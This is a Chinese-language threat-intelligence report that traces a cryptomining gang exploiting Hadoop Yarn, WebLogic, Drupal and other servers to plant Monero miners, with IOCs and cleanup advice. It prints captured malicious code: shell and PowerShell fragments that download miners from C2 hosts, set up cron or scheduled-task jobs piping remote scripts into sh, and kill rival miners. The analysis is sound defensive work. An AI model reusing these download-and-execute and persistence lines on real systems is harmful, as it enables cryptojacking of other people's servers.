压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

疑似國內來源的“8220挖礦團伙”追蹤溯源分析

背景

當今互聯網的高速發展,孕育出了一批高新產業,如人工智能、分布式計算、區塊鏈、無人駕駛等。這些高新技術為人們生活帶來便利的同時,引發的安全問題也日益凸顯。隨著區塊鏈技術的普及,其涉及的虛擬數字貨幣也創造了巨大的財富。這些虛擬貨幣可以通過“挖礦”的形式獲取,“礦工”越多,利益越大。因此,近年來有越來越多的黑客團伙通過非法入侵控制互聯網上的計算機并植入木馬程序偷偷進行挖礦活動,為自己謀取暴利。

而在近期,360威脅情報中心根據某高校客戶的反饋捕獲到一批新的針對Linux平臺的挖礦木馬,而通過溯源關聯分析發現這只是一個疑似國內來源的專業黑客團伙長期活動中的一部分。360威脅情報中心監測到該團伙在過去的一年非常活躍,使用了多個漏洞對網絡中的服務器進行攻擊:例如使用了WebLogic XMLDecoder反序列化漏洞、Drupal的遠程任意代碼執行漏洞、JBosss反序列化命令執行漏洞、Couchdb的組合漏洞、Redis、Hadoop未授權訪問漏洞等入侵互聯網中的服務器并植入挖礦木馬長期獲利。在一系列的攻擊活動中,我們發現該團伙的C2服務器統一使用8220號端口,因此360威脅情報中心將該團伙命名為“8220挖礦團伙”,并在后續的分析中以此代號對該團伙進行相關分析。

來源

近日,360威脅情報中心接到某高校客戶反饋:最近幾臺用做分布式計算的服務器出現機器不穩定、卡頓、服務響應不及時等現象,他們通過對系統性能的檢查,發現CPU利用率高達700%,這使得他們感到疑惑。360威脅情報中心協助用戶對此事件進行了跟進分析,發現這是一起攻擊者利用Hadoop Yarn資源管理系統REST API未授權漏洞對服務器進行攻擊并植入了最新的門羅幣挖礦木馬進行挖礦的安全事件。

問題排查

在獲得客戶同意后,360威脅情報中心研究人員對存在問題的Linux服務器進行了遠程排查,發現攻擊者是通過未打補丁的Hadoop Yarn資源管理系統入侵服務器的。進一步排查后獲取到一個最新的Linux挖礦木馬,排查過程如下。(懷疑自己中了同類挖礦木馬的用戶,可以使用如下命令進行自檢,清理方案詳見安全建議一節。)

  • 首先執行$ top命令,檢查系統運行狀態,此臺Linux服務器的CPU利用率為732%

  • 再執行$ ps aux | grep [pid]命令,定位到可疑的挖礦木馬文件,位于/var/tmp/目錄下

  • 繼續執行$ hadoop version命令,檢查Hadoop版本,當前Linux服務器上安裝的Hadoop版本號為2.6.0(此版本支持認證服務,但若未開啟,攻擊者則可通過Hadoop Yarn資源管理系統REST API未授權漏洞入侵系統)

  • 執行$ crontab -u yarn -l命令,檢查任務計劃,yarn用戶每分鐘向C2地址發起請求,獲取最新腳本文件

  • 執行$ head /var/log/cron-20180617命令(實際操作中需要查看對應的日志文件),檢查任務計劃日志,發現挖礦木馬在6月10日替換過C2地址

通過上述操作,我們定位到了此次事件中的門羅幣挖礦木馬程序和核心控制腳本,并進行了詳細分析,分析情況見樣本分析一節。

攻擊植入過程分析

通過對其中某臺服務器檢查,360威脅情報中心初步判定攻擊者利用了Hadoop Yarn REST API未授權漏洞入侵了這些服務器,從而植入挖礦木馬實現獲利:

Hadoop Yarn REST API未授權漏洞是由于YARN配置不當而引起的:若服務器未開啟Kerberos認證服務,攻擊者可以直接向Hadoop服務器的8088/8090端口發送請求,申請新的Application ID,獲取服務器返回的ID后,攻擊者便可向Hadoop服務提交作業,在作業中添加惡意載荷,執行遠程指令,進而實現控制服務器,完成挖礦等活動。

360威脅情報中心分析了整個攻擊植入流程如下:

樣本分析

相關樣本

我們將此次事件中挖礦木馬的核心文件以列表的形式整理如下,并逐一進行分析:

文件名 MD5 作用
cr.sh 1f6554f2559d83ace7f0af82d32beb72 Shell腳本,用于下載挖礦程序和配置文件
x_64 7f4d9a672bb7ff27f641d29b99ecb08a 64位ELF挖礦程序
x_32 b00f4bbd82d2f5ec7c8152625684f853 32位ELF挖礦程序
w.conf 配置文件,保存錢包地址,礦池地址

樣本分析–cr.sh核心腳本

攻擊者利用YARN默認開放的8088端口服務,向服務器提交惡意作業,該作業包含遠程下載并執行Shell腳本的命令。下載回來的腳本cr.sh完成如下功能:

  1. 清理主機環境:停止、刪除主機已經存在的其他挖礦程序
  2. 檢查主機環境:檢查指定的挖礦程序是否已經存在
  3. 配置主機環境:下載挖礦程序和配置文件并執行
  4. 持續感染主機:設置任務計劃,保持更新,持續感染主機
  5. 清理任務計劃:清除其他挖礦相關的任務計劃

清理主機環境代碼片段:結束當前主機正在運行的其他已知挖礦程序并刪除,已知挖礦程序的文件名如pscf、ntpd、ntp、qq、qq1等:

...
ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9
rm -rf /var/tmp/pscf*
rm -rf /tmp/pscf*
pkill -f ririg
rm -rf /var/tmp/ntpd
pkill -f /var/tmp/ntpd
rm -rf /var/tmp/ntp
pkill -f /var/tmp/ntp
rm -rf /var/tmp/qq
rm -rf /var/tmp/qq1
pkill -f /var/tmp/qq
rm -rf /tmp/qq
rm -rf /tmp/qq1
pkill -f /tmp/qq
pkill -f /var/tmp/aa
rm -rf /var/tmp/aa
...

核心功能代碼片段:代碼會先檢查本地挖礦程序是否已經存在,如果不存在則調用downloadIfNeed函數,該函數會檢查并下載最新的挖礦程序和配置文件。downloadIfNeed函數執行完成之后,會利用nohup命令后臺執行挖礦程序,同時刪除配置文件,防止泄漏個人錢包地址,礦池地址等:

...
if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
??? downloadIfNeed
??? chmod +x $DIR/java
??? $WGET $DIR/w.conf https://raw.githubusercontent.com/ffazop1/mygit/master/w.conf
??? nohup $DIR/java -c $DIR/w.conf > /dev/null 2>&1 &
??? sleep 5
??? rm -rf $DIR/w.conf
else
??? echo "Running"
fi
...

任務計劃相關代碼片段:代碼會檢查當前任務計劃中,是否存在46.249.38.186地址,如果沒有,則會寫入利用curl或者wget下載并執行cr.sh腳本的任務計劃,同時會調用pkill命令結束其他已知的挖礦進程、清理其他挖礦腳本的任務計劃:

...
if crontab -l | grep -q "46.249.38.186"
then
??? echo "Cron exists"
else
??? echo "Cron not found"
??? LDR="wget -q -O -"
??? if [ -s /usr/bin/curl ];
??? then
??????? LDR="curl";
??? fi
??? if [ -s /usr/bin/wget ];
??? then
??????? LDR="wget -q -O -";
??? fi
??? (crontab -l 2>/dev/null; echo "* * * * * $LDR http://46.249.38.186/cr.sh | sh > /dev/null 2>&1")| crontab -
fi
?
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | crontab -
crontab -l | sed '/192.99.142.226/d' | crontab -
crontab -l | sed '/192.99.142.248/d' | crontab -
crontab -l | sed '/45.77.86.208/d' | crontab -
...

樣本分析–挖礦程序

文件名 MD5 版本號 編譯時間
x_64 7f4d9a672bb7ff27f641d29b99ecb08a 2.6.2 20180624
x_32 b00f4bbd82d2f5ec7c8152625684f853 2.5.2 20180520

cr.sh腳本中內置了兩個挖礦程序的MD5,如果當前主機中的挖礦程序MD5不在這兩個MD5中,則cr.sh會從指定的服務器上下載對應的挖礦程序。

通過360威脅情報中心大數據分析平臺,我們獲取到這兩個MD5對應對文件。經過簡單分析,這兩個文件分別為Linux下的32位和64位挖礦程序,并且都是基于XMRig[2]開源挖礦工具修改的。挖礦程序支持如下命令:/var/folders/5p/fpmmhst95cq03r6vt534zw300000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/xmrig.png

32位挖礦程序基于XMRig2.5.2版本修改,2016年編譯生成,程序中內置1個錢包地址:48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD,屬于開源挖礦軟件作者,用于抽水。

64位挖礦程序基于XMRig2.6.2修改,2017年編譯生成,程序中內置兩個錢包地址,一個屬于開源軟件作者,另一個錢包地址:46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S,則可定位到開源項目cpuhunter[3]。

樣本分析–w.conf配置文件

cr.sh腳本同時會從指定的服務器上下載挖礦配置文件,作為參數傳遞給挖礦程序,并在挖礦開始后刪除該配置文件,保證隱私性。我們通過配置文件中的錢包地址和礦池地址信息關聯到了“8220挖礦團伙”大量利用服務器漏洞進行入侵挖礦的攻擊事件,詳見溯源與關聯一節。

C2信息

本次事件中,攻擊者使用了Github作為云分發平臺,保存挖礦程序和配置文件。360威脅情報中心數據平臺顯示,該攻擊者會不定期的創建刪除Github賬號,保證可用性及隱私性。

已使用的Github賬戶名(均已刪除):

  • ffazop1
  • zzgamond1

Github項目地址(均已刪除):

  • https://raw.githubusercontent.com/ffazop1/mygit/master/w.conf
  • https://raw.githubusercontent.com/ffazop1/mygit/master/x_64
  • https://raw.githubusercontent.com/zzgamond1/mygit/master/w.conf
  • https://raw.githubusercontent.com/zzgamond1/mygit/master/x_64

溯源與關聯

使用360威脅情報中心數據分析平臺對此次事件中出現的文件、IP地址、端口、關鍵字、錢包地址、MD5等進行關聯分析,我們跟蹤到一個疑似國內來源的挖礦黑客團伙,在該團伙所有的挖礦攻擊活動中都擁有以下共同特點,使得360威脅情報中心將這些挖礦攻擊事件全部關聯到同一伙人身上:

端口關聯

在多起事件中,出現的C2服務器統一使用8220號端口,因此我們可將其作為身份識別的一個弱特征。

文件名關聯

在多起事件中,重復使用了相同的文件名,例如1.ps1、2.ps1、logo0.jpg、logo2.jpg、logo3.jpg、logo4.jpg、logo7.jpg等,因此我們也將其作為身份識別的一個弱特征。

錢包地址關聯

從同一個C2上,我們獲取到該團伙不同時期使用的兩個腳本,這兩個腳本包含了兩個不同的門羅幣錢包地址,并且這兩個錢包地址在這些事件中都有使用。考慮錢包的私有特性,我們可將其作為身份識別的一個強特征。

且通過大數據分析顯示,該團伙已經存在很長時間,并且在過去一年中異常活躍,在幾起曝光的嚴重漏洞攻擊事件中,都有該團伙的身影。另外從關聯的信息中,我們發現該團伙的挖礦活動涉及Linux和Windows平臺。種種跡象表明,該團伙不斷在積累自身的網絡攻擊武器庫,以支撐他們對網絡中存在漏洞的主機進行自動化的攻擊,最終拿下主機并實現挖礦的目的。

并且360威脅情報中心推測該團伙是利用Docker進行C2服務器自動化部署工作,導致這些C2統一使用8220號端口與木馬進行通信。因此360威脅情報中心將該團伙命名為“8220挖礦團伙”:

運行在C2服務器8220端口上的Apache服務

攻擊活動時間線

通過對關聯信息的整理歸納,我們繪制了過去一年與該團伙相關的攻擊活動的時間圖:

活動圖中的時間順序僅為我們發現該團伙最早的活動時間,并不表示該團伙只在此時間段利用此漏洞。相應的,此圖直觀體現了該團伙積累了較多的網絡攻擊武器。我們有理由相信,還有大量關于該團伙的未被曝光的攻擊事件。

攻擊手法

360威脅情報中心將溯源關聯到的“8220挖礦團伙”近年來所有的攻擊事件和攻擊手法逐一進行分析。我們詳細介紹其中的兩類漏洞利用相關的攻擊事件,其他的以列表的形式整理在后文。

WebLogic漏洞攻擊事件(清理同類挖礦木馬保證一家獨大)

通過360威脅情報中心數據平臺,我們發現了一起利用WebLogic漏洞進行入侵服務器并進行挖礦的攻擊活動。在此活動中,攻擊者使用了相同的錢包地址,因此我們也將其確定為“8220挖礦團伙”所為。

攻擊者利用WebLogic XMLDecoder反序列化漏洞(編號CVE-2017-10271[4])攻擊服務器,并獲取服務器控制權限,進而植入挖礦木馬進行挖礦。該漏洞出現在WebLogic Server Security Service中,影響WebLogic Server 12.2.1.2.0及其之前的版本。利用此漏洞,攻擊者下載名為2.ps1的PowerShell腳本并執行。腳本進而會下載挖礦木馬程序,進行挖礦活動。同時,該腳本也會終止其他挖礦程序運行,保證自己獨占CPU資源。

PowerShell腳本會從192.99.142.232:8220服務器下載xmrig.exe挖礦程序,以yam.exe的文件名保存在本地,通過cmd.exe啟動挖礦程序,同時傳入礦池地址,錢包地址,密碼信息:

$ne = $MyInvocation.MyCommand.Path
$nurl = "http://192.99.142.232:8220/xmrig.exe"
$noutput = "$env:TMP\yam.exe"
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($nurl,$noutput)
copy $ne $HOME\SchTask.ps1
copy $env:TMP\yam.exe $env:TMP\pe.exe
?
SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle productsa" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File 
...
cmd.exe /C taskkill /IM 360rps.exe /f
cmd.exe /C $env:TMP\pe.exe --donate-level=1 -k -a cryptonight -o stratum+tcp://monerohash.com:5555 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x

Drupal漏洞利用

通過對C2地址的深度挖掘,我們發現一篇今年4月國外安全廠商發布的報告[5]。報告中提到了兩種利用Drupal遠程任意代碼執行漏洞(編號CVE-2018-7600[6])的挖礦木馬程序,通過錢包地址的關聯,確定其中一種挖礦木馬也是“8220挖礦團伙”所擁有。

而Drupal的遠程任意代碼執行漏洞是由于Drupal對表單的渲染引起的。為了能夠在表單渲染對過程中動態修改數據,Drupal引入了“Drupal Render API”機制[7],“Drupal Render API”對于#會進行特殊處理,其中#pre_render在render之前操作數組,#post_render接收render的結果并在其添加包裝,#lazy_builder用于在render過程的最后添加元素。由于對于部分#屬性數組值,Drupal會通過call_user_func的方式進行處理,導致任意代碼執行。漏洞驗證POC[8],利用此POC可快速驗證Drupal是否存在該漏洞。

“8220挖礦團伙”利用此漏洞下載并執行挖礦程序。其中的Shell惡意腳本代碼將wget -q http://192.99.142.235:8220/logo4.jpg -O – | sh命令寫入任務計劃,實現對服務器的持續感染。同時從192.99.142.235:8220下載配置文件3.json和挖礦程序rig,分別保存為config.json和sustes,最后利用nohup命令在后臺運行挖礦。

...
crontab -r || true && \
echo "* * * * * wget -q http://192.99.142.235:8220/logo4.jpg -O - | sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.235:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.235:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
...

其它漏洞利用列表

服務 利用說明
JBosss 利用JBosss反序列化命令執行漏洞(編號CVE-2017-12149[9]),漏洞影響5.X和6.X版本。利用此漏洞可在未經任何身份驗證的服務器主機上執行任意代碼。”8220挖礦團伙”利用此漏洞下載并執行PowerShell腳本,進行挖礦活動。
Couchdb 利用Couchdb的組合漏洞(編號CVE-2017-12635[10],?CVE–2017–12636[11])。利用CVE-2017-12635漏洞,可以給自身添加管理員權限;利用CVE-2017-12636,可以實現遠程任意代碼執行。”8220挖礦團伙”利用這兩個漏洞完成對目標的攻擊,進行挖礦活動。
Redis Redis默認情況下運行在0.0.0.0:6379上。若Redis服務暴露在公網,同時沒有開啟認證,則攻擊者可以在未授權的情況下訪問Redis服務,執行惡意操作。”8220挖礦團伙”通過網絡掃描工具,發現存在該漏洞的主機,并進行攻擊,實現挖礦活動。
Hadoop Yarn Yarn的ResourceManager UI默認運行在0.0.0.0:8088端口上,允許用戶通過接口進行相關的應用創建、任務提交執行等操作。若該服務暴露在公網,同時沒有開啟認證,則攻擊者可以在未授權訪問的情況下執行惡意操作。”8220挖礦團伙”利用此漏洞進行遠程命令執行,實現挖礦活動。
Kubernetes Kubelet默認開啟10255和10250端口,攻擊者可以在未授權的情況下執行惡意操作。”8220挖礦團伙”利用該漏洞,遠程執行下載腳本的命令,實現在容器中的挖礦活動。

Docker鏡像利用

360威脅情報中心還發現國外一篇關于Docker Hub鏡像的安全研究報告[12]中,疑似出現“8220挖礦團伙”的身影。報告指出,從2017年05月注冊賬號開始,到2018年05月刪除賬號結束,該賬號陸續上傳了17個惡意docker鏡像,鏡像下載量達到500萬次以上。這些鏡像的功能大致可分為如下四類:

  1. 反彈主機的SHELL
  2. 向主機中添加SSH公鑰
  3. 在主機中添加任務計劃
  4. 利用鏡像完成挖礦

通過對報告中出現的錢包信息,C2信息等,結合360威脅情報中心數據平臺關聯的同一時間段信息,我們確定此賬號為“8220挖礦團伙”所擁有。更加證實了我們關于這是一支專業挖礦團伙的判定。

“8220挖礦團伙”挖礦信息統計

360威脅情報中心統計了“8220挖礦團伙”近年來所有攻擊活動中常用的錢包信息、收益狀況等如下。

錢包信息

錢包1

  • 錢包地址:

41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo

  • Monerohash上的有效期:? — 2018/5/08
  • 總收益:90.1934XMR(僅Monerohash公開礦池)
  • 交易記錄截圖

錢包2

  • 錢包地址:

4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

  • Monerohash上的有效期:2018/5/15 — 今
  • 總收益:140.3400XMR(僅Monerohash公開礦池)
  • 交易記錄截圖

收益匯總及評估

僅看Monerohash公開礦池的交易記錄,“8220挖礦團伙”累計獲取超過230枚門羅幣。其中,錢包2提供的算力高達365KH/sec,占Monerohash礦池算力的7%左右。做個簡單估算,以INTEL CORE I5-2400處理器作為參考,核心全開的情況下算力大約在70H/sec左右,那么相當于大約有5200臺服務器在同一時間為該團伙進行挖礦。

通過查詢其他相關公開礦池的交易記錄,此團伙累計獲取超過1000枚門羅幣,按照市價974元/枚計算,其價值將近100萬元人民幣。考慮還有未統計的公開礦池及無法查詢的私有礦池,保守估計該團伙累計獲益已達數百萬。

錢包信息關聯

從以上交易截圖中可觀察出,“8220挖礦團伙”前期使用的錢包1在今年4月時,被安全廠商標注為Botnet,各大公開礦池也將其列入黑名單,禁止接入挖礦。此后,該團伙使用了另一個錢包2,在大型礦池挖礦,并持續至今。

攻擊者畫像-疑似國內團伙

我們對涉及的樣本做了簡單的統計如下:

配置文件使用過的名稱:

  • w.conf、dd1.conf、gg1.conf、test.conf、tes.conf、hh1.conf
  • kkk1.confttt1.conf、ooo1.conf、ppp1.conf

挖礦程序使用過的名稱:

  • nginx、suppoie、java、mysql、cpu.c、ntpd、psping、java-c、pscf、
  • cryptonight、sustes、xmr-stak、ririg、ntp、qqaa、ubyx
  • logo4.jpg、logo0.jpg、logo9.jpg
  • apaqidajiba、look、orgfs、crant、jvs、javs

通過對相關樣本的統計分析,結合其具有中文特色命名的特點、交易發生的時間(統計分析主要集中在UTC+8時區)及其他一些信息,我們懷疑這是一支來源于國內的挖礦團伙。360威脅情報中心后續將繼續跟進該團伙,采集更多信息對其進行全方位網絡畫像。

總結及安全建議

針對此次高校服務器挖礦事件中出現的惡意樣本,360威脅情報中心建議用戶使用如下步驟檢測及清理疑似中招的服務器:

  1. 使用top查看進程,KILL掉異常進程
  2. 檢查/var/tmp目錄,刪除java、pscf3、w.conf等異常文件
  3. 檢查crontab任務列表,刪除異常任務
  4. 檢查YARN日志,刪除異常的Application ID
  5. 開啟Hadoop Kerberos認證服務

而對于日益嚴重的入侵網絡服務器植入挖礦木馬的攻擊事件(現階段幾乎是黑客團伙最喜歡的攻擊獲利方式之一),360威脅情報中心建議企業客戶盡量做好以下防范措施:

  • 定期對服務器進行加固,盡早修復服務器相關安全漏洞,如有條件務必安裝服務器端的安全軟件
  • 當發現主機存在挖礦木馬時,務必立即進行全方位的檢查,必要時請聯系專業的安全公司進行協助處理
  • 關注360威脅情報中心更新的最新安全通告,對相應的安全威脅及時進行排查

目前,基于360威脅情報中心的威脅情報數據的全線產品,包括360威脅情報平臺(TIP)、天眼高級威脅檢測系統、360 NGSOC等,都已經支持對此挖礦團伙攻擊活動的實時檢測和相關未知攻擊的預警。

IOC

礦池地址及C2

IP 說明
158.69.133.20:3333 私有礦池地址
192.99.142.249:3333 私有礦池地址
202.144.193.110:3333 私有礦池地址
192.99.142.232:8220 C2
192.99.142.235:8220 C2
192.99.142.226:8220 C2
192.99.142.246:8220 C2
192.99.142.248:8220 C2
158.69.133.18:8220 C2
198.181.41.97:8220 C2
46.249.38.186 C2

相關樣本

樣本MD5 說明
b00f4bbd82d2f5ec7c8152625684f853 32位ELF挖礦程序
183664ceb9c4d7179d5345249f1ee0c4 64位ELF挖礦程序
4fa4269b7ce44bfce5ef574e6a37c38f 64位ELF挖礦程序
52c748513583aa573d3649f701db61b2 64位ELF挖礦程序
54b0f140da40e5713377f4d4a8f143ad 64位ELF挖礦程序
7f4d9a672bb7ff27f641d29b99ecb08a 64位ELF挖礦程序
b245362aa364f94496380cfd2f002493 64位ELF挖礦程序
c644c04bce21dacdeb1e6c14c081e359 64位ELF挖礦程序
c8c1f2da51fbd0aea60e11a81236c9dc 64位ELF挖礦程序
d0874ba34cfbdf714fcf2c0a117cc8e2 64位ELF挖礦程序
ea6500b759ab46fb5e8fc6ebac03a605 64位ELF挖礦程序
fa7a3c257428b4c7fda9f6ac67311eda 64位ELF挖礦程序
3ed4adb65428f2c8ab75e60c3cebc9fa 64位EXE挖礦程序
6b33c34623f3051a996f38e536d158af 64位EXE挖礦程序
b3a831bfa590274902c77b6c7d4c31ae 64位EXE挖礦程序
014b3d382eee186758b52e22ee13f3f8 Linux Shell腳本,用于下載執行挖礦程序和配置文件
03744545ccda5d06171273253c590a0b Linux Shell腳本,用于下載執行挖礦程序和配置文件
0c95e09417764caf3b7ba3d6d9a066b0 Linux Shell腳本,用于下載執行挖礦程序和配置文件
0ca338869d304db50a0fae160b9f1074 Linux Shell腳本,用于下載執行挖礦程序和配置文件
0ee6730d50ad5093f673840d647472b4 Linux Shell腳本,用于下載執行挖礦程序和配置文件
0f5337d8d9c90f3b5e541674ff154586 Linux Shell腳本,用于下載執行挖礦程序和配置文件
1535bb790378111e5909713e9ec3592f Linux Shell腳本,用于下載執行挖礦程序和配置文件
1b07503b10e6e42e40262c581a3bbd7c Linux Shell腳本,用于下載執行挖礦程序和配置文件
1b8ba726ec2a06edf3966c43cfb0b764 Linux Shell腳本,用于下載執行挖礦程序和配置文件
1b99c8c3df90a1f1b25759a71b9db82f Linux Shell腳本,用于下載執行挖礦程序和配置文件
1ce819f4f5c79f5450d248f606435ad8 Linux Shell腳本,用于下載執行挖礦程序和配置文件
1ec712bd868c76e721bc09a0688aebf8 Linux Shell腳本,用于下載執行挖礦程序和配置文件
1f0bb2a26c4ef0df865cdc6d4e568a89 Linux Shell腳本,用于下載執行挖礦程序和配置文件
1f159b9b758827f87fbf47e6f40a8cf7 Linux Shell腳本,用于下載執行挖礦程序和配置文件
1f616fc858de6ff490f41c70cacc1520 Linux Shell腳本,用于下載執行挖礦程序和配置文件
20908240df66707eaf8f54e91ae87cdd Linux Shell腳本,用于下載執行挖礦程序和配置文件
22bbdffe5a4dffe4042daea6ff2d01b7 Linux Shell腳本,用于下載執行挖礦程序和配置文件
23e594e0174c74516017e95fff1c58a9 Linux Shell腳本,用于下載執行挖礦程序和配置文件
23fb5e0ad71601c561276c4cde9652ea Linux Shell腳本,用于下載執行挖礦程序和配置文件
24ef2192dbc0ae9e97b9e0834f7e81c3 Linux Shell腳本,用于下載執行挖礦程序和配置文件
2f7880878a13e159c7e9101f5697bb6b Linux Shell腳本,用于下載執行挖礦程序和配置文件
30dcc9621875a7af3c098fd30bb80312 Linux Shell腳本,用于下載執行挖礦程序和配置文件
354ec95034bd94cbf2eb79a472ce7c0d Linux Shell腳本,用于下載執行挖礦程序和配置文件
36fbb9d3dc0010f726f748c289810dff Linux Shell腳本,用于下載執行挖礦程序和配置文件
386b9509c931198c39f3171da1a9c510 Linux Shell腳本,用于下載執行挖礦程序和配置文件
38d20175bdf9986ee02181c15481741a Linux Shell腳本,用于下載執行挖礦程序和配置文件
3cb03701dc0c15a0989d54830d651443 Linux Shell腳本,用于下載執行挖礦程序和配置文件
3f0b8e298ad3cba12ecc1e5f602651e5 Linux Shell腳本,用于下載執行挖礦程序和配置文件
417062ba22213167047bc30156a4b4b0 Linux Shell腳本,用于下載執行挖礦程序和配置文件
46dc656201f59669646535edece25da4 Linux Shell腳本,用于下載執行挖礦程序和配置文件
4a71e9f08ef1bf77ba30f44ac9558fe3 Linux Shell腳本,用于下載執行挖礦程序和配置文件
53ee3809cabd327403ef858252cdbe78 Linux Shell腳本,用于下載執行挖礦程序和配置文件
5934d5ffe24db9300a59af31cc07cdff Linux Shell腳本,用于下載執行挖礦程序和配置文件
5ac4f6aaaeabcee559da4928d185490e Linux Shell腳本,用于下載執行挖礦程序和配置文件
5d48329667c089b04cc211765617f4fc Linux Shell腳本,用于下載執行挖礦程序和配置文件
5edb31d74372c79d5e555ea2e954eaca Linux Shell腳本,用于下載執行挖礦程序和配置文件
669d300909abca282e7bdc9c7b6f3bb6 Linux Shell腳本,用于下載執行挖礦程序和配置文件
6e49abda38340231d79da934509fafe4 Linux Shell腳本,用于下載執行挖礦程序和配置文件
76205e10a8f1a038cee14e3626f77454 Linux Shell腳本,用于下載執行挖礦程序和配置文件
7a669eb1c299e1632d0a3f879781dc5c Linux Shell腳本,用于下載執行挖礦程序和配置文件
7a7e788f2bfe8cd8a4def0225a8e2168 Linux Shell腳本,用于下載執行挖礦程序和配置文件
7c01fdf27193763d8d5dc6fd5d4594a9 Linux Shell腳本,用于下載執行挖礦程序和配置文件
8150c3588a0aed85847aae976242a1d4 Linux Shell腳本,用于下載執行挖礦程序和配置文件
822f2a98c8389103c9e3692fcadec9ae Linux Shell腳本,用于下載執行挖礦程序和配置文件
86e896b12d905d2069c8369e9fc47c26 Linux Shell腳本,用于下載執行挖礦程序和配置文件
900cc2b750007fec06e32b2acd04b880 Linux Shell腳本,用于下載執行挖礦程序和配置文件
907a11aaa5a020e89f44e8696040e738 Linux Shell腳本,用于下載執行挖礦程序和配置文件
90838725f9e8abfebf8936c69026db61 Linux Shell腳本,用于下載執行挖礦程序和配置文件
91284eeb0e232845f067746883c2b460 Linux Shell腳本,用于下載執行挖礦程序和配置文件
93b0f438886ce29109a57086d4ecc2e5 Linux Shell腳本,用于下載執行挖礦程序和配置文件
9695151a172f31ea7a0895d83da3891d Linux Shell腳本,用于下載執行挖礦程序和配置文件
9aa4584d4b6f3bc8e5f2a1fac3d2fe95 Linux Shell腳本,用于下載執行挖礦程序和配置文件
9ae5cf3d0454641e4cc4ee55c79ad6a5 Linux Shell腳本,用于下載執行挖礦程序和配置文件
9b30566971ac7bd7696f9782445d1971 Linux Shell腳本,用于下載執行挖礦程序和配置文件
9d2e09745ed642c1d1be4f2cb82b9d14 Linux Shell腳本,用于下載執行挖礦程序和配置文件
a1035c8aab177986ad605732577d87d8 Linux Shell腳本,用于下載執行挖礦程序和配置文件
a206f764510149eb3a41f8a78c098673 Linux Shell腳本,用于下載執行挖礦程序和配置文件
a2bdc466dced6f2597968cb53e9972e0 Linux Shell腳本,用于下載執行挖礦程序和配置文件
a38c6cbfeffb95dc693660c7d4b52999 Linux Shell腳本,用于下載執行挖礦程序和配置文件
a748e59e064d8683620857c6a412f446 Linux Shell腳本,用于下載執行挖礦程序和配置文件
a836250acb9bce43d4cd8612a11ef5d8 Linux Shell腳本,用于下載執行挖礦程序和配置文件
aaba0654448c49814cbf035bd1c01d48 Linux Shell腳本,用于下載執行挖礦程序和配置文件
b07aaddfb97614100978fa78b33bf224 Linux Shell腳本,用于下載執行挖礦程序和配置文件
b18bc898e41645cef90764d102a0365c Linux Shell腳本,用于下載執行挖礦程序和配置文件
b54110a68d9fabf313ea3ea13939b37c Linux Shell腳本,用于下載執行挖礦程序和配置文件
be8d8ca9f8b5e1e44a77c9ecdddce995 Linux Shell腳本,用于下載執行挖礦程序和配置文件
c1a653ffe732a238822092072d3b1c2d Linux Shell腳本,用于下載執行挖礦程序和配置文件
c2f01f208c96fbaa5768ac9f6104250e Linux Shell腳本,用于下載執行挖礦程序和配置文件
c3a13920f5d75270890d62d0be38e719 Linux Shell腳本,用于下載執行挖礦程序和配置文件
c78415001298a818f961555de575d2fb Linux Shell腳本,用于下載執行挖礦程序和配置文件
d097cfbf23e75191f8094e319200521d Linux Shell腳本,用于下載執行挖礦程序和配置文件
d41e6009471bd340a2b693b44c014323 Linux Shell腳本,用于下載執行挖礦程序和配置文件
d58d2b4b1653bb27eab252a2d41dbaea Linux Shell腳本,用于下載執行挖礦程序和配置文件
da9d3e7d912ede7328cc9735a2de4d51 Linux Shell腳本,用于下載執行挖礦程序和配置文件
db3ae99764596ba49e6650253bc82557 Linux Shell腳本,用于下載執行挖礦程序和配置文件
de9d981ac9cd8067078242daa610ed8f Linux Shell腳本,用于下載執行挖礦程序和配置文件
e1f58848a987f23fe990dc7d47014756 Linux Shell腳本,用于下載執行挖礦程序和配置文件
e2fd8a0bc98b85857c1508e645038cd2 Linux Shell腳本,用于下載執行挖礦程序和配置文件
e334a7284acd38141c7e80cece0ed9e5 Linux Shell腳本,用于下載執行挖礦程序和配置文件
e96deab7e84efe3e44935797a103dc08 Linux Shell腳本,用于下載執行挖礦程序和配置文件
ec6b0af3dba82a5011503be846ed4221 Linux Shell腳本,用于下載執行挖礦程序和配置文件
f0773ffd1f0347188ef8c7d54e8f72c7 Linux Shell腳本,用于下載執行挖礦程序和配置文件
